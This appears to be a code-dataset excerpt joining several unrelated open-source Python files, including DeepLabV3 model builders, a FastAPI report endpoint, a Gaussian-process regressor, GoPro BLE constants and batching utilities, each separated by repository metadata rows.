# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Adafruitsht31library', u'Adafruit sht31 Library Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Adafruitsht31Library', u'Adafruit sht31 Library Documentation',
author, 'Adafruitsht31Library', 'One line description of project.',
'Miscellaneous'),
]
| 33.847134 | 324 | 0.687053 |
d83179aef51d4daa236fd403e3d9926e126d3825 | 6,000 | py | Python | network/modeling.py | nvoliver/DeepLabV3Plus-Pytorch | b9f18f7849da062aa68c4417944ba910863210dc | ["MIT"] | null | null | null | network/modeling.py | nvoliver/DeepLabV3Plus-Pytorch | b9f18f7849da062aa68c4417944ba910863210dc | ["MIT"] | null | null | null | network/modeling.py | nvoliver/DeepLabV3Plus-Pytorch | b9f18f7849da062aa68c4417944ba910863210dc | ["MIT"] | null | null | null |
from .utils import IntermediateLayerGetter
from ._deeplab import DeepLabHead, DeepLabHeadV3Plus, DeepLabV3
from .backbone import resnet
from .backbone import mobilenetv2
def _segm_resnet(name, backbone_name, num_classes, output_stride, pretrained_backbone):
    # Modification: Option to override dilation
override_dilation = None
if isinstance(output_stride, (list, tuple)):
output_stride, override_dilation = output_stride
assert isinstance(override_dilation, (list, tuple))
assert len(override_dilation) == 3
if output_stride==8:
replace_stride_with_dilation=[False, True, True]
aspp_dilate = [12, 24, 36]
else:
replace_stride_with_dilation=[False, False, True]
aspp_dilate = [6, 12, 18]
    # Modification: Option to override dilation
aspp_dilate = override_dilation or aspp_dilate
backbone = resnet.__dict__[backbone_name](
pretrained=pretrained_backbone,
replace_stride_with_dilation=replace_stride_with_dilation)
inplanes = 2048
low_level_planes = 256
if name=='deeplabv3plus':
return_layers = {'layer4': 'out', 'layer1': 'low_level'}
classifier = DeepLabHeadV3Plus(inplanes, low_level_planes, num_classes, aspp_dilate)
elif name=='deeplabv3':
return_layers = {'layer4': 'out'}
        classifier = DeepLabHead(inplanes, num_classes, aspp_dilate)
backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)
model = DeepLabV3(backbone, classifier)
return model
def _segm_mobilenet(name, backbone_name, num_classes, output_stride, pretrained_backbone):
if output_stride==8:
aspp_dilate = [12, 24, 36]
else:
aspp_dilate = [6, 12, 18]
backbone = mobilenetv2.mobilenet_v2(pretrained=pretrained_backbone, output_stride=output_stride)
# rename layers
backbone.low_level_features = backbone.features[0:4]
backbone.high_level_features = backbone.features[4:-1]
backbone.features = None
backbone.classifier = None
inplanes = 320
low_level_planes = 24
if name=='deeplabv3plus':
return_layers = {'high_level_features': 'out', 'low_level_features': 'low_level'}
classifier = DeepLabHeadV3Plus(inplanes, low_level_planes, num_classes, aspp_dilate)
elif name=='deeplabv3':
return_layers = {'high_level_features': 'out'}
        classifier = DeepLabHead(inplanes, num_classes, aspp_dilate)
backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)
model = DeepLabV3(backbone, classifier)
return model
def _load_model(arch_type, backbone, num_classes, output_stride, pretrained_backbone):
if backbone=='mobilenetv2':
model = _segm_mobilenet(arch_type, backbone, num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
elif backbone.startswith('resnet'):
model = _segm_resnet(arch_type, backbone, num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
else:
raise NotImplementedError
return model
# Deeplab v3
def deeplabv3_resnet50(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3 model with a ResNet-50 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3', 'resnet50', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3_resnet101(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3 model with a ResNet-101 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3', 'resnet101', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3_mobilenet(num_classes=21, output_stride=8, pretrained_backbone=True, **kwargs):
"""Constructs a DeepLabV3 model with a MobileNetv2 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3', 'mobilenetv2', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
# Deeplab v3+
def deeplabv3plus_resnet50(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3 model with a ResNet-50 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3plus', 'resnet50', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3plus_resnet101(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3+ model with a ResNet-101 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3plus', 'resnet101', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3plus_mobilenet(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3+ model with a MobileNetv2 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3plus', 'mobilenetv2', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
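# Hedged usage sketch (not part of the original module; run it from code that imports
# this package, since the relative imports above prevent direct script execution).
# The tensor shape is illustrative and pretrained_backbone=False avoids a download:
#   import torch
#   from network.modeling import deeplabv3plus_mobilenet
#   model = deeplabv3plus_mobilenet(num_classes=21, output_stride=16, pretrained_backbone=False)
#   model.eval()
#   with torch.no_grad():
#       out = model(torch.randn(1, 3, 513, 513))  # expected shape: (1, 21, 513, 513)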
| 40.540541 | 137 | 0.736333 |
2f9328eff5ba9eecd4ee4d5cef8d43bf8cbb4848 | 1,075 | py | Python | mkt/prices/tests/test_utils.py | muffinresearch/zamboni | 045a6f07c775b99672af6d9857d295ed02fe5dd9 | ["BSD-3-Clause"] | null | null | null | mkt/prices/tests/test_utils.py | muffinresearch/zamboni | 045a6f07c775b99672af6d9857d295ed02fe5dd9 | ["BSD-3-Clause"] | null | null | null | mkt/prices/tests/test_utils.py | muffinresearch/zamboni | 045a6f07c775b99672af6d9857d295ed02fe5dd9 | ["BSD-3-Clause"] | null | null | null |
from StringIO import StringIO
from nose.tools import eq_
import amo.tests
from mkt.prices.models import Price, PriceCurrency
from mkt.prices.utils import update, update_from_csv
tiers = [
{'USD': '0.99', 'BRL': '1.99'},
# This row should be ignored, no tier of value 3.
{'USD': '3.00'},
# This row should be ignored, not US tier.
{'CAD': '10'}
]
csv = StringIO("""USD\tCAD\tBRL\n0.99\t1.99\t1.00""")
class TestUpdate(amo.tests.TestCase):
def setUp(self):
self.tier = Price.objects.create(name='1', price='0.99')
def test_create(self):
update(tiers)
eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')
assert not PriceCurrency.objects.filter(currency='CAD').exists()
def test_update(self):
PriceCurrency.objects.create(currency='BRL', tier=self.tier, price='2')
update(tiers)
eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')
def test_csv(self):
update_from_csv(csv)
assert PriceCurrency.objects.filter(currency='CAD').exists()
| 28.289474 | 79 | 0.654884 |
e134b4db1803380cbd4f9909d307d3ba012eee67 | 1,935 | py | Python | fastapi/reportapi.py | fahadysf/fy-az-func-test | 60cfd5dc2899a3ea0f960075f953dcc5f95f39c9 | ["MIT"] | null | null | null | fastapi/reportapi.py | fahadysf/fy-az-func-test | 60cfd5dc2899a3ea0f960075f953dcc5f95f39c9 | ["MIT"] | null | null | null | fastapi/reportapi.py | fahadysf/fy-az-func-test | 60cfd5dc2899a3ea0f960075f953dcc5f95f39c9 | ["MIT"] | null | null | null |
import azure.functions as func
import fastapi
from fastapi.templating import Jinja2Templates
from .http_asgi import AsgiMiddleware
from .reports import gen_data
import xmltodict
import json
app = fastapi.FastAPI()
templates = Jinja2Templates(directory="./templates")
@app.get("/api/report/")
async def get_report_data(
request: fastapi.Request,
type: str,
customer_id: str,
edge_id: str,
timeframe: str = "15m",
format: str = "xml",
):
"""
Args:
type: {report type} possible-compromised-hosts
timeframe: {report time frame} options: 15m
customer_id: {customer bcrm ID}
edge_id: {customer edge ID}
format: {output format 'xml' or 'json'}
"""
context = {
"request": request,
"type": type,
"customer_id": customer_id,
"edge_id": edge_id,
"timeframe": timeframe,
}
# modern method of merging dicts (Python 3.9+ only)
context = context | gen_data(report_type=type)
if type == 'possible-compromised-hosts':
data = templates.TemplateResponse(
"possible-compromised-hosts.xml",
context, media_type='application/xml')
elif type == 'top-apps':
data = templates.TemplateResponse(
"top-apps.xml", context, media_type='application/xml')
else:
data = templates.TemplateResponse(
"shampoo.xml", {"request": request, "id": id},
media_type='application/xml')
# return fastapi.Response(content=data, media_type="application/xml")
if format == 'json':
jsondata = xmltodict.parse(data.body.decode('utf-8'))
data = fastapi.Response(content=json.dumps(
jsondata, indent=2, sort_keys=False), media_type='text/json')
return data
def main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:
return AsgiMiddleware(app).handle(req, context)
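# Hedged usage sketch (not part of the original module). Because the FastAPI app is
# wrapped by AsgiMiddleware for Azure Functions, it can also be exercised directly
# with Starlette's TestClient; the query-string values below are hypothetical:
#   from fastapi.testclient import TestClient
#   client = TestClient(app)
#   resp = client.get("/api/report/", params={
#       "type": "top-apps", "customer_id": "C123", "edge_id": "E1",
#       "timeframe": "15m", "format": "json"})
#   print(resp.status_code, resp.headers["content-type"])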
| 31.209677 | 76 | 0.636693 |
962ada4dd58c8d3fc911d6834cdf9620f56983aa | 621 | py | Python | torch_em/util/__init__.py | JonasHell/torch-em | 2e008e0cd2f0ea6681581374fce4f9f47b986d55 | ["MIT"] | 13 | 2021-03-09T21:31:09.000Z | 2022-03-21T05:24:26.000Z | torch_em/util/__init__.py | JonasHell/torch-em | 2e008e0cd2f0ea6681581374fce4f9f47b986d55 | ["MIT"] | 16 | 2021-03-02T23:19:34.000Z | 2022-03-25T19:43:41.000Z | torch_em/util/__init__.py | JonasHell/torch-em | 2e008e0cd2f0ea6681581374fce4f9f47b986d55 | ["MIT"] | 4 | 2021-05-18T08:29:33.000Z | 2022-02-11T12:16:20.000Z |
from .image import load_image, supports_memmap
from .modelzoo import (add_weight_formats,
convert_to_onnx,
convert_to_torchscript,
export_bioimageio_model,
export_parser_helper,
get_default_citations,
import_bioimageio_model)
from .reporting import get_training_summary
from .training import parser_helper
from .util import (ensure_array, ensure_spatial_array,
ensure_tensor, ensure_tensor_with_channels,
get_constructor_arguments, get_trainer)
| 44.357143 | 62 | 0.63124 |
017f59f5abbad366d108989ca80a6aed2d6c4cd4 | 8,594 | py | Python | malt/models/regressor.py | uli-ai/malt | ad8120056a35ec306c7f3058310ca2034f18faa3 | ["MIT"] | null | null | null | malt/models/regressor.py | uli-ai/malt | ad8120056a35ec306c7f3058310ca2034f18faa3 | ["MIT"] | null | null | null | malt/models/regressor.py | uli-ai/malt | ad8120056a35ec306c7f3058310ca2034f18faa3 | ["MIT"] | 1 | 2021-03-21T03:12:51.000Z | 2021-03-21T03:12:51.000Z |
# =============================================================================
# IMPORTS
# =============================================================================
import abc
import torch
# =============================================================================
# BASE CLASSES
# =============================================================================
class Regressor(torch.nn.Module, abc.ABC):
"""Base class for a regressor."""
def __init__(self, in_features, out_features, *args, **kwargs):
super(Regressor, self).__init__()
self.in_features = in_features
self.out_features = out_features
# =============================================================================
# KERNELS
# =============================================================================
class RBF(torch.nn.Module):
r""" A Gaussian Process Kernel that hosts parameters.
Note
----
l could be either of shape 1 or hidden dim
"""
def __init__(self, in_features, scale=0.0, variance=0.0, ard=True):
super(RBF, self).__init__()
if ard is True:
self.scale = torch.nn.Parameter(scale * torch.ones(in_features))
else:
self.scale = torch.nn.Parameter(torch.tensor(scale))
self.variance = torch.nn.Parameter(torch.tensor(variance))
def distance(self, x, x_):
""" Distance between data points. """
return torch.norm(x[:, None, :] - x_[None, :, :], p=2, dim=2)
def forward(self, x, x_=None):
""" Forward pass. """
# replicate x if there's no x_
if x_ is None:
x_ = x
# for now, only allow two dimension
assert x.dim() == 2
assert x_.dim() == 2
x = x * torch.exp(self.scale)
x_ = x_ * torch.exp(self.scale)
# (batch_size, batch_size)
distance = self.distance(x, x_)
        # covariance matrix
# (batch_size, batch_size)
k = torch.exp(self.variance) * torch.exp(-0.5 * distance)
return k
# =============================================================================
# MODULE CLASSES
# =============================================================================
class NeuralNetworkRegressor(Regressor):
""" Regressor with neural network. """
def __init__(
self,
in_features: int = 128,
hidden_features: int = 128,
out_features: int = 2,
depth: int = 2,
activation: torch.nn.Module = torch.nn.ReLU(),
):
super(NeuralNetworkRegressor, self).__init__(
in_features=in_features, out_features=out_features
)
# bookkeeping
self.hidden_features = hidden_features
self.out_features = out_features
# neural network
modules = []
_in_features = in_features
for idx in range(depth - 1):
modules.append(torch.nn.Linear(_in_features, hidden_features))
modules.append(activation)
_in_features = hidden_features
modules.append(torch.nn.Linear(hidden_features, out_features))
self.ff = torch.nn.Sequential(*modules)
def forward(self, x):
return self.ff(x)
class ExactGaussianProcessRegressor(Regressor):
epsilon = 1e-7
def __init__(
self,
in_features: int=128,
out_features: int=2,
kernel_factory: torch.nn.Module = RBF,
log_sigma: float=-3.0,
):
assert out_features == 2
super(ExactGaussianProcessRegressor, self).__init__(
in_features=in_features, out_features=out_features,
)
# construct kernel
self.kernel = kernel_factory(
in_features=in_features,
)
self.in_features = in_features
self.log_sigma = torch.nn.Parameter(
torch.tensor(log_sigma),
)
def _get_kernel_and_auxiliary_variables(
self, x_tr, y_tr, x_te=None,
):
""" Get kernel and auxiliary variables for forward pass. """
# compute the kernels
k_tr_tr = self._perturb(self.kernel.forward(x_tr, x_tr))
if x_te is not None: # during test
k_te_te = self._perturb(self.kernel.forward(x_te, x_te))
k_te_tr = self._perturb(self.kernel.forward(x_te, x_tr))
# k_tr_te = self.forward(x_tr, x_te)
k_tr_te = k_te_tr.t() # save time
else: # during train
k_te_te = k_te_tr = k_tr_te = k_tr_tr
# (batch_size_tr, batch_size_tr)
k_plus_sigma = k_tr_tr + torch.exp(self.log_sigma) * torch.eye(
k_tr_tr.shape[0], device=k_tr_tr.device
)
# (batch_size_tr, batch_size_tr)
l_low = torch.cholesky(k_plus_sigma)
l_up = l_low.t()
        # (batch_size_tr, 1)
l_low_over_y, _ = torch.triangular_solve(
input=y_tr, A=l_low, upper=False
)
# (batch_size_tr, 1)
alpha, _ = torch.triangular_solve(
input=l_low_over_y, A=l_up, upper=True
)
return k_tr_tr, k_te_te, k_te_tr, k_tr_te, l_low, alpha
def condition(self, x_te, *args, x_tr=None, y_tr=None, **kwargs):
r""" Calculate the predictive distribution given `x_te`.
Note
----
        Here we allow the specification of a sampler but won't actually
        use it in this version.
Parameters
----------
x_te : `torch.Tensor`, `shape=(n_te, hidden_dimension)`
Test input.
x_tr : `torch.Tensor`, `shape=(n_tr, hidden_dimension)`
(Default value = None)
Training input.
y_tr : `torch.Tensor`, `shape=(n_tr, 1)`
(Default value = None)
            Training target.
sampler : `torch.optim.Optimizer` or `pinot.Sampler`
(Default value = None)
Sampler.
Returns
-------
distribution : `torch.distributions.Distribution`
Predictive distribution.
"""
# get parameters
(
k_tr_tr,
k_te_te,
k_te_tr,
k_tr_te,
l_low,
alpha,
) = self._get_kernel_and_auxiliary_variables(x_tr, y_tr, x_te)
# compute mean
# (batch_size_te, 1)
mean = k_te_tr @ alpha
# (batch_size_tr, batch_size_te)
v, _ = torch.triangular_solve(input=k_tr_te, A=l_low, upper=False)
# (batch_size_te, batch_size_te)
variance = k_te_te - v.t() @ v
        # ensure symmetric
variance = 0.5 * (variance + variance.t())
# $ p(y|X) = \int p(y|f)p(f|x) df $
# variance += torch.exp(self.log_sigma) * torch.eye(
# *variance.shape,
# device=variance.device)
# construct noise predictive distribution
distribution = torch.distributions.multivariate_normal.MultivariateNormal(
mean.flatten(), variance
)
return distribution
def _perturb(self, k):
"""Add small noise `epsilon` to the diagonal of covariant matrix.
Parameters
----------
k : `torch.Tensor`, `shape=(n_data_points, n_data_points)`
Covariant matrix.
Returns
-------
k : `torch.Tensor`, `shape=(n_data_points, n_data_points)`
Preturbed covariant matrix.
"""
# introduce noise along the diagonal
noise = self.epsilon * torch.eye(*k.shape, device=k.device)
return k + noise
def loss(self, x_tr, y_tr, *args, **kwargs):
r""" Compute the loss.
Note
----
Defined to be negative Gaussian likelihood.
Parameters
----------
x_tr : `torch.Tensor`, `shape=(n_training_data, hidden_dimension)`
Input of training data.
y_tr : `torch.Tensor`, `shape=(n_training_data, 1)`
Target of training data.
Returns
-------
nll : `torch.Tensor`, `shape=(,)`
Negative log likelihood.
"""
# point data to object
self._x_tr = x_tr
self._y_tr = y_tr
# get the parameters
(
k_tr_tr,
k_te_te,
k_te_tr,
k_tr_te,
l_low,
alpha,
) = self._get_kernel_and_auxiliary_variables(x_tr, y_tr)
import math
# we return the exact nll with constant
nll = (
0.5 * (y_tr.t() @ alpha)
+ torch.trace(l_low)
+ 0.5 * y_tr.shape[0] * math.log(2.0 * math.pi)
)
return nll
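# Hedged usage sketch (not part of the original module; tensor sizes and the tiny
# training loop are illustrative only):
#   import torch
#   x_tr, y_tr, x_te = torch.randn(32, 128), torch.randn(32, 1), torch.randn(8, 128)
#   gp = ExactGaussianProcessRegressor(in_features=128, out_features=2)
#   opt = torch.optim.Adam(gp.parameters(), lr=1e-2)
#   for _ in range(10):
#       opt.zero_grad()
#       gp.loss(x_tr, y_tr).backward()
#       opt.step()
#   pred = gp.condition(x_te, x_tr=x_tr, y_tr=y_tr)  # MultivariateNormal over the 8 test points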
| 29.431507 | 82 | 0.520363 |
7cd063e2786c7e403985ccca5f3856155102aba4 | 7,367 | py | Python | demos/python/sdk_wireless_camera_control/open_gopro/constants.py | matteo-pupa/OpenGoPro | bdb47b0451c394f0ae07023c4f342c75317d73d4 | ["MIT"] | null | null | null | demos/python/sdk_wireless_camera_control/open_gopro/constants.py | matteo-pupa/OpenGoPro | bdb47b0451c394f0ae07023c4f342c75317d73d4 | ["MIT"] | null | null | null | demos/python/sdk_wireless_camera_control/open_gopro/constants.py | matteo-pupa/OpenGoPro | bdb47b0451c394f0ae07023c4f342c75317d73d4 | ["MIT"] | null | null | null |
# constants.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Wed, Sep 1, 2021 5:05:44 PM
"""Constant numbers shared across the GoPro module. These do not change across Open GoPro Versions"""
from enum import Enum, EnumMeta
from typing import Union, Tuple, Iterator, Type, TypeVar
import construct
from open_gopro.ble import UUID
T = TypeVar("T")
GOPRO_BASE_UUID = "b5f9{}-aa8d-11e3-9046-0002a5d5c51b"
class GoProEnumMeta(EnumMeta):
"""Modify enum metaclass to build GoPro specific enums"""
ITER_SKIP_NAMES = ["NOT_APPLICABLE"]
def __iter__(cls: Type[T]) -> Iterator[T]:
"""Do not return enum values whose name is in the ITER_SKIP_NAMES list
Returns:
Iterator[T]: enum iterator
"""
return iter([x[1] for x in cls._member_map_.items() if x[0] not in GoProEnumMeta.ITER_SKIP_NAMES]) # type: ignore
class GoProEnum(Enum, metaclass=GoProEnumMeta):
"""GoPro specific enum to be used for all settings, statuses, and parameters
The name NOT_APPLICABLE is special as it will not be returned as part of the enum iterator
"""
class ErrorCode(GoProEnum):
"""Status Codes."""
SUCCESS = 0
ERROR = 1
INVALID_PARAM = 2
class CmdId(GoProEnum):
"""Command ID's that are written to UUID.CQ_COMMAND."""
SET_SHUTTER = 0x01
POWER_DOWN = 0x04
SLEEP = 0x05
SET_PAIRING_COMPLETE = 0x03
GET_CAMERA_SETTINGS = 0x12
GET_CAMERA_STATUSES = 0x13
SET_WIFI = 0x17
GET_SETTINGS_JSON = 0x3B
GET_HW_INFO = 0x3C
LOAD_PRESET_GROUP = 0x3E
LOAD_PRESET = 0x40
SET_THIRD_PARTY_CLIENT_INFO = 0x50
GET_THIRD_PARTY_API_VERSION = 0x51
SET_TURBO_MODE = 0xF1
GET_PRESET_STATUS = 0xF5
class ActionId(GoProEnum):
"""Action ID's that identify a protobuf command."""
SET_TURBO_MODE = 0x6B
GET_PRESET_STATUS = 0x02
class SettingId(GoProEnum):
"""Setting ID's that identify settings and are written to UUID.CQ_SETTINGS."""
RESOLUTION = 2
FPS = 3
INTERNAL_5 = 5
INTERNAL_6 = 6
INTERNAL_13 = 13
INTERNAL_19 = 19
INTERNAL_24 = 24
INTERNAL_30 = 30
INTERNAL_31 = 31
INTERNAL_32 = 32
INTERNAL_37 = 37
INTERNAL_41 = 41
INTERNAL_42 = 42
INTERNAL_43 = 43
INTERNAL_44 = 44
INTERNAL_45 = 45
INTERNAL_47 = 47
INTERNAL_48 = 48
INTERNAL_54 = 54
AUTO_OFF = 59
INTERNAL_60 = 60
INTERNAL_61 = 61
INTERNAL_62 = 62
INTERNAL_64 = 64
INTERNAL_65 = 65
INTERNAL_66 = 66
INTERNAL_67 = 67
INTERNAL_68 = 68
INTERNAL_69 = 69
INTERNAL_75 = 75
INTERNAL_76 = 76
INTERNAL_79 = 79
INTERNAL_83 = 83
INTERNAL_84 = 84
INTERNAL_85 = 85
INTERNAL_86 = 86
INTERNAL_87 = 87
INTERNAL_88 = 88
LED = 91
INTERNAL_96 = 96
INTERNAL_102 = 102
INTERNAL_103 = 103
INTERNAL_104 = 104
INTERNAL_105 = 105
INTERNAL_106 = 106
INTERNAL_111 = 111
INTERNAL_112 = 112
INTERNAL_114 = 114
INTERNAL_115 = 115
INTERNAL_116 = 116
INTERNAL_117 = 117
INTERNAL_118 = 118
VIDEO_FOV = 121
PHOTO_FOV = 122
MULTI_SHOT_FOV = 123
INTERNAL_124 = 124
INTERNAL_125 = 125
INTERNAL_126 = 126
INTERNAL_128 = 128
SHORTCUT_LOWER_LEFT = 129
SHORTCUT_LOWER_RIGHT = 130
SHORTCUT_UPPER_LEFT = 131
SHORTCUT_UPPER_RIGHT = 132
INTERNAL_133 = 133
INTERNAL_134 = 134
INTERNAL_135 = 135
INTERNAL_139 = 139
INTERNAL_144 = 144
INTERNAL_145 = 145
INTERNAL_146 = 146
INTERNAL_147 = 147
INTERNAL_148 = 148
INTERNAL_149 = 149
INTERNAL_153 = 153
INTERNAL_154 = 154
INTERNAL_155 = 155
INTERNAL_156 = 156
INTERNAL_157 = 157
INTERNAL_158 = 158
INTERNAL_159 = 159
INTERNAL_160 = 160
INTERNAL_161 = 161
MAX_LENS_MOD = 162
INTERNAL_163 = 163
INTERNAL_164 = 164
INTERNAL_165 = 165
INTERNAL_166 = 166
INTERNAL_167 = 167
INTERNAL_168 = 168
INTERNAL_169 = 169
INVALID_FOR_TESTING = 0xFF
class QueryCmdId(GoProEnum):
"""Command ID that is written to UUID.CQ_QUERY."""
GET_SETTING_VAL = 0x12
GET_STATUS_VAL = 0x13
GET_SETTING_NAME = 0x22
GET_CAPABILITIES_VAL = 0x32
GET_CAPABILITIES_NAME = 0x42
REG_SETTING_VAL_UPDATE = 0x52
REG_STATUS_VAL_UPDATE = 0x53
REG_CAPABILITIES_UPDATE = 0x62
UNREG_SETTING_VAL_UPDATE = 0x72
UNREG_STATUS_VAL_UPDATE = 0x73
UNREG_CAPABILITIES_UPDATE = 0x82
SETTING_VAL_PUSH = 0x92
STATUS_VAL_PUSH = 0x93
SETTING_CAPABILITY_PUSH = 0xA2
INVALID_FOR_TESTING = 0xFF
class StatusId(GoProEnum):
"""Status ID to identify statuses sent to UUID.CQ_QUERY or received from UUID.CQ_QUERY_RESP."""
BATT_PRESENT = 1
BATT_LEVEL = 2
EXT_BATT_PRESENT = 3
EXT_BATT_LEVEL = 4
SYSTEM_HOT = 6
SYSTEM_BUSY = 8
QUICK_CAPTURE = 9
ENCODING = 10
LCD_LOCK_ACTIVE = 11
VIDEO_PROGRESS = 13
INTERNAL_14 = 14
WIRELESS_ENABLED = 17
PAIR_STATE = 19
PAIR_TYPE = 20
PAIR_TIME = 21
WAP_SCAN_STATE = 22
WAP_SCAN_TIME = 23
WAP_PROV_STAT = 24
REMOTE_CTRL_VER = 26
REMOTE_CTRL_CONN = 27
PAIR_STATE2 = 28
WLAN_SSID = 29
AP_SSID = 30
APP_COUNT = 31
PREVIEW_ENABLED = 32
SD_STATUS = 33
PHOTOS_REM = 34
VIDEO_REM = 35
NUM_GROUP_PHOTO = 36
NUM_GROUP_VIDEO = 37
NUM_TOTAL_PHOTO = 38
NUM_TOTAL_VIDEO = 39
DATE_TIME = 40
OTA_STAT = 41
DOWNLAD_CANCEL_PEND = 42
MODE_GROUP = 43
LOCATE_ACTIVE = 45
INTERNAL_46 = 46
INTERNAL_47 = 47
INTERNAL_48 = 48
MULTI_COUNT_DOWN = 49
SPACE_REM = 54
STREAMING_SUPP = 55
WIFI_BARS = 56
CURRENT_TIME_MS = 57
NUM_HILIGHTS = 58
LAST_HILIGHT = 59
NEXT_POLL = 60
ANALYTICS_RDY = 61
ANALYTICS_SIZE = 62
IN_CONTEXT_MENU = 63
TIMELAPSE_REM = 64
EXPOSURE_TYPE = 65
EXPOSURE_X = 66
EXPOSURE_Y = 67
GPS_STAT = 68
AP_STATE = 69
INT_BATT_PER = 70
ACC_MIC_STAT = 74
DIGITAL_ZOOM = 75
WIRELESS_BAND = 76
DIG_ZOOM_ACTIVE = 77
MOBILE_VIDEO = 78
FIRST_TIME = 79
SEC_SD_STAT = 80
BAND_5GHZ_AVAIL = 81
SYSTEM_READY = 82
BATT_OK_OTA = 83
CAPTURE_DELAY = 84
VIDEO_LOW_TEMP = 85
ORIENTATION = 86
THERMAL_MIT_MODE = 87
ZOOM_ENCODING = 88
FLATMODE_ID = 89
INTERNAL_90 = 90
LOGS_READY = 91
TIMEWARP_1X_ACTIVE = 92
VIDEO_PRESETS = 93
PHOTO_PRESETS = 94
TIMELAPSE_PRESETS = 95
PRESETS_GROUP = 96
ACTIVE_PRESET = 97
PRESET_MODIFIED = 98
LIVE_BURST_REM = 99
LIVE_BURST_TOTAL = 100
CAPT_DELAY_ACTIVE = 101
MEDIA_MOD_MIC_STAT = 102
TIMEWARP_SPEED_RAMP = 103
LINUX_CORE_ACTIVE = 104
CAMERA_LENS_TYPE = 105
VIDEO_HINDSIGHT = 106
SCHEDULED_PRESET = 107
SCHEDULED_CAPTURE = 108
CREATING_PRESET = 109
MEDIA_MOD_STAT = 110
SD_RATING_CHECK_ERROR = 111
SD_WRITE_SPEED_ERROR = 112
TURBO_MODE = 113
CAMERA_CONTROL = 114
USB_CONNECTED = 115
ProducerType = Tuple[QueryCmdId, Union[SettingId, StatusId]]
"""Types that can be registered for."""
CmdType = Union[CmdId, QueryCmdId, ActionId]
"""Types that identify a command."""
ResponseType = Union[CmdType, StatusId, SettingId, UUID, str, construct.Enum]
"""Types that are used to identify a response."""
| 24.313531 | 122 | 0.674223 |
a812c1e18b4dd190c316c467d60571cf515a8e65 | 5,360 | py | Python | nnlib/utils/batching.py | huzecong/nnlib | fd68abc51028444ce7c789642e2a7b8ed1853255 | ["MIT"] | 1 | 2019-01-08T03:55:23.000Z | 2019-01-08T03:55:23.000Z | nnlib/utils/batching.py | huzecong/nnlib | fd68abc51028444ce7c789642e2a7b8ed1853255 | ["MIT"] | null | null | null | nnlib/utils/batching.py | huzecong/nnlib | fd68abc51028444ce7c789642e2a7b8ed1853255 | ["MIT"] | null | null | null |
from typing import List, Sequence, Tuple, TypeVar, overload, Iterator
import numpy as np
from nnlib.torch import *
from nnlib.utils.iterable import MeasurableGenerator
from nnlib.utils.math import ceil_div
__all__ = ['minibatches_from', 'pad_sequences', 'batch_sequences', 'shift_packed_seq', 'mask_dropout_embeddings']
T = TypeVar('T')
def _minibatches_from(data: List[T], size: int = 16, shuffle: bool = True,
different_size: bool = False) -> Iterator[List[T]]:
length = len(data)
if shuffle:
idxs = np.random.permutation(ceil_div(length, size)) * size
else:
idxs = np.arange(ceil_div(length, size)) * size
for idx in idxs:
if not different_size and idx + size > length:
batch = list(data[-size:])
else:
batch = list(data[idx:(idx + size)])
yield batch
def minibatches_from(data: List[T], size: int = 16, shuffle: bool = True,
different_size: bool = False) -> Iterator[List[T]]:
r"""
A low-level API to directly create mini-batches from a list.
:param data: Data to create mini-batches for.
:param size: Batch size.
:param shuffle: Whether to shuffle data.
:param different_size: If ``True``, allows the final batch to have different size than specified batch size.
        If ``False``, the final batch is filled out to the full batch size by reusing elements from the end of the data.
:return: A generator yielding one batch at a time.
"""
generator = _minibatches_from(data, size, shuffle, different_size)
length = ceil_div(len(data), size)
return MeasurableGenerator(generator, length)
def pad_sequences(seqs: List[List[int]], batch_first: bool = False, pad: int = -1) -> LongTensor:
r"""
A wrapper around :func:`nn.utils.rnn.pad_sequence` that takes a list of lists, and converts it into a list of
:class:`torch.LongTensor`\ s.
"""
tensor_seqs = [torch.tensor(seq, dtype=torch.long) for seq in seqs]
return nn.utils.rnn.pad_sequence(tensor_seqs, batch_first=batch_first, padding_value=pad)
@overload
def batch_sequences(seqs: Sequence[Sequence[T]], ordered: bool) -> PackedSequence: ...
@overload
